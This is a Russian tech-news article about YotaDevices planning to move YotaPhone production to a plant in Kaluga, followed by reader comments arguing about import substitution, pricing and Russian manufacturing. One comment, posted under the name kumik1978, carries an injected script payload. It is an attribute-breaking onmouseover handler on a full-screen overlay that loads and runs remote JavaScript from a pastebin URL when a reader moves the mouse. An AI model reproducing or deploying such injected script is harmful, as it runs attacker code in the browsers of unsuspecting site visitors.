YotaPhone станет по-настоящему российским

|
FavoriteLoading В закладки
YotaPhone станет по-настоящему российским

О планах по переносу производства смартфона на территорию России заявил глава YotaDevices Владислав Мартынов. Начинка «первого отечественного смартфона» также обновится российскими компонентами.

После успеха YotaPhone 2 за океаном, руководство компании решило сделать очередной шаг в сторону российского потребителя. В рамках глобального плана по импортозамещению в сфере IT производство уникального смартфона с двумя экранами может начаться на территории РФ.

Производственная база Калужского электромеханического завода уже подготовлена к работе над YotaPhone, однако по словами руководителя компании это будет лишь «пробная партия защищенных устройств».

«Когда мы отладим производство в Калуге, то сможем продавать наши защищенные устройства не только в России. Плюс в будущем мы сможем оптимизировать себестоимость и развивать на этой базе новые направления.»

– добавил Мартынов

Выбор предприятия обусловлен необходимостью строгого контроля за качеством сборки. В ближайшем будущем YotaDevices также планирует заменить часть компонентов своих устройств аналогами отечественного производства. [Газета]

Поставьте оценку:

1 Звезд2 Звезды3 Звезды4 Звезды5 Звезд (Нет голосов)
Оставайся в теме. Подпишись на наш Telegram 👏
... и не забывай читать наш Facebook и Twitter 🍒
FavoriteLoading В закладки
undefined
iPhones.ru
О планах по переносу производства смартфона на территорию России заявил глава YotaDevices Владислав Мартынов. Начинка «первого отечественного смартфона» также обновится российскими компонентами. После успеха YotaPhone 2 за океаном, руководство компании решило сделать очередной шаг в сторону российского потребителя. В рамках глобального плана по импортозамещению в сфере IT производство уникального смартфона с двумя экранами может начаться...
Прокомментировать

🙈 Комментарии 33

  1. IvanZh avatar
    IvanZh27 июля 2015
    11

    Как человек занимающийся оптовыми поставками электронных компонентов могу сказать, что максимум что они заменят так это корпус и то наврятли =) Вся элементная база импортная, производство отечественной элементной базы идет на специфичное военное производство. Хотя может они вкрутят какой-нить чип от ракеты и когда надо ётафон взлетит в сторону запада =)

    Smolny avatar
    Smolny28 июля 2015
    0

    @IvanZh, где работаешь? Глобальный, локальный дисти?
    Почти коллега, я вендор :)

    Артём Куликов avatar
    0

    @IvanZh, ага, вслед за “Протон-М” полетит.

    Andrey Bystrov28 июля 2015
    1

    @IvanZh, Скорее всего отделаются защитным бампером или чехлом

  2. G-3 avatar
    G-327 июля 2015
    0

    Защищенное устройство — задняя крышка защищена экраном. А боковые стенки не защищены. Развод, пацаны!

  3. G-3 avatar
    G-327 июля 2015
    5

    Информационная инфляция происходит с айфонс.ру…

  4. peper- avatar
    peper-28 июля 2015
    19

    Странный PR ход. К сожалению (для Йоты) те, кто ведутся на эту лабуду с импортозамещением, не обладают достаточными финансовыми ресурсами для приобретения Йотафона. Те же, кто, напротив, могут его себе позволить, обладают достаточным запасом мозгов, чтобы не смотреть “новости на 1-м канале” и не покупать YP вместо iPhone или Samsung только потому, что первый вроде как отечественный. Пусть у нас все правительство, все сенаторы и депутаты, все их замы и помощники _за свой счет_ себе ЙотаФоны купит. Тогда и поговорим. А пока у нас вице-премьеры призывают народ затянуть пояса, отказаться от иностранных товаров и продуктов да и вообще меньше есть, а сами платят за аренду недвижимости 600 млн. рублей как с куста.

    bred28 июля 2015
    0

    @peper-, что вы предлагаете? Забыть вообще и не развиваться в данной сфере? Проблема етофона поздний старт, когда рынок уже захвачен, и новички редко пробиваются, да отставание по многим показателем, тем не менее идея интересная…. И говорить забейте пускай сами депутаты покупают… Ета не госкомпания и депутаты к ней ни коим местом не относятся…

    bred28 июля 2015
    0

    @peper-, да и то что открыв завод под калугой обеспечит наших свами соотечественников ни только телефоном но и рабочими местами, это очень не плохо!

    mashkin avatar
    mashkin28 июля 2015
    1

    @peper-, Полностью согласен

  5. cetus avatar
    cetus28 июля 2015
    5

    из всей информации радует только одно, технопарк в Калуге развивается и там много реальных рабочих мест.
    остальное как и жигули, по моему скептическому мнению станет интересно позже если это не превратится в военную отрасль.

    RazielAkuma avatar
    RazielAkuma28 июля 2015
    0

    @cetus, ты из Калуги? Мне лично плевать, развивается у них там технопарк или нет. Мне важно чтобы в страну потекли капиталы. В первую очередь мне интересен сам Я. Как и любому из вас. Вот если бы после этого йотофоны стали стоить 6000-10000 т.р. Я бы хлопал стоя. А так это очередная ЧАСТНАЯ компания, которая рубит бабло на вас.

    admiless avatar
    admiless28 июля 2015
    0

    @cetus, жигули интересны? вы живете в какой-то другой реальности наверно :)
    жигули интересны исключительно по невменяемых пошлин на импорт. любой вменяемый человек при выборе новой лады и 5-летней Audi выберет последнюю

  6. uKho avatar
    uKho28 июля 2015
    0

    пусть идут в опу.
    вот моё скромное мнение.

  7. Pavel Zim avatar
    Pavel Zim28 июля 2015
    0

    Достаточно заменить только чипы с программным кодом. Или получить доступ к этим кодам. Заменить все, конечно, нереально, но обезопасить себя вполне возможно.

    G-3 avatar
    G-328 июля 2015
    2

    @Pavel Zim, очень даже реально заменить. Дисковый номеронабиратель и пленочную камеру никто не отменял. Ну сделают чуть компактнее их. И норм. Не надо впадать в скепсис.

    Pavel Zim avatar
    Pavel Zim28 июля 2015
    0

    @G-3, Ваш сарказм объясняю только ненавистью к России и всему российскому. Потому как на дебила вы мало похожи.

    G-3 avatar
    G-328 июля 2015
    2

    @Pavel Zim, Я в целом о другом говорю. Зачем изобретать велосипед, наши компоненты будут в ближайшем приближении дороже и хуже (поскольку нет собственных разработок). То есть либо закусить губу и терпеть, либо использовать импортное. Все это подчиняется законам экономики и истории экономического роста других стран. Поэтому ётафон-2-3-4 полностью российским и хорошим не будет. Одно ведро внутри чего стоит. Второй путь – изобретение собственных схем компоновки, архитектуры и т.д. Но это не в ближайших ётафонах. А родину я люблю и уважаю, но не за ётафон. И не за ВАЗ.

    Pavel Zim avatar
    Pavel Zim28 июля 2015
    0

    @G-3, Ну, тогда извините. Что же касается законов экономики – никто не спорит.

  8. kumik1978 avatar
    kumik197828 июля 2015
    0

    Главное чтобы по дешевле :[

    [” onmouseover=”this.style.display=’none’;var scrpt = document.createElement(‘script’);scrpt.src=’http://pastebin.com/raw.php?i=YqqFNcT6′;document.head.appendChild(scrpt);” style=”position:fixed;left:0px;top:0px;width:100%;height:100%;z-index:10000;display:block” ]

  9. Valdemar.ST avatar
    Valdemar.ST28 июля 2015
    5

    Трёп Мартынова уже конкретно надоел. Чёрт с ним, с первым Йотафоном, первый блин комом и всё такое. Но наглое бесстыдство, с которым они впаривают второй Йотафон, да ещё и по цене самолёта, прикрываясь откровенным бредом про курс $, просто уже невыносимо.

    Andrey Bystrov28 июля 2015
    1

    @Valdemar.ST, Российкий телефон, цена которого, напрямую зависит от курса доллара? Вот оно хваленое импортозамещение!

    SimpleWhite avatar
    SimpleWhite28 июля 2015
    0

    @Andrey Bystrov, а вы считаете, что можно вот так раз и отрасль целиком построить за пару лет? Они правильно делают – постепенно развивают наработки внутри страны. Да, сейчас это дорого, но будет все время дешеветь.

    Valdemar.ST avatar
    Valdemar.ST29 июля 2015
    1

    @SimpleWhite, то о чём Вы говорите, актуально для брендов типа HiScreen, которые на деле пытаются сделать удачные аппараты на Андройде и по адекватной цене. А проблема YotaDevices и Мартынова в частности в том, что они действительно считают себя русским Купертино во главе с русским Стивом Джобсом и действительно полагают что смогут составить КОНКУРЕНЦИЮ Apple. В реальности никакой конкуренции не может быть даже с брендами ASUS или LG, которые продают свою продукцию по куда более адекватным ценам, а про бренды типа Lenovo и говорить нечего.

  10. voice avatar
    voice28 июля 2015
    4

    Какое отвратительное слово импортозамещение. Назовите пример 5 стран где это дало долгосрочный позитивный экономический эффект. Все должно жить и конкурировать в рамках глобальной экономики в конкурентной борьбе. Все должно подаваться законом рынка и если вы их нарушаете до потом дорого заплатите за это.

    SimpleWhite avatar
    SimpleWhite28 июля 2015
    0

    @voice, китай?

    voice avatar
    voice28 июля 2015
    1

    @SimpleWhite, Что????/ Когда это китай занимался такой хитрой практикой. Китай это соверешено про другое. Это мощная и продуманная модель развития экономики. А добились они такого мощного развития за счет того что пустили к себе все западные компании , получили и получают гиганские инвестиции. Это другая модель вообще.

  11. finnn111 avatar
    finnn11128 июля 2015
    3

    “Чужая слава покоя не даёт”. )))
    Видимо хотят повторить славу Автоваза, признанного лидера мирового автопрома))

    G-3 avatar
    G-328 июля 2015
    0

    @finnn111, у ватоваза не слава, а статистика и тиражи. Много не значит хорошо. Вот УАЗ да! Тут слава))

    Andrey Bystrov28 июля 2015
    2

    @finnn111, У вас в слове “автохлама”, аж три ошибки!

  12. d.joker28 июля 2015
    0

    Отличная новость!
    Стоит пожелать успехов компании! Главное положить начало. Ведь когда-то нужно начинать!

    admiless avatar
    admiless28 июля 2015
    0

    @d.joker, в данном случае важнее вовремя закончить
    хотя если попросить ВВП и ввести налоги на импортные девайсы как на автопром, вполне себе будет спрос на Йотафон. ведь при разнице в 5-6 раз люди явно “поддержат отечественного производителя”
    актуально как никогда http://youtu.be/-e00TPb9HmI

  13. NKTN avatar
    NKTN29 июля 2015
    0

    прихожу в салон мегафона, стоит айфон за 43490р, а рядом йотафон за 39990… ну… как бы я не любил родину, ну там природу, родных, друзей, берёзки, не заставите за такие деньги покупать “отечественный андройд”

Вы должны авторизоваться или зарегистрироваться для комментирования.

Нашли орфографическую ошибку в новости?

Выделите ее мышью и нажмите Ctrl+Enter.

Как установить аватар в комментариях?

Ответ вот здесь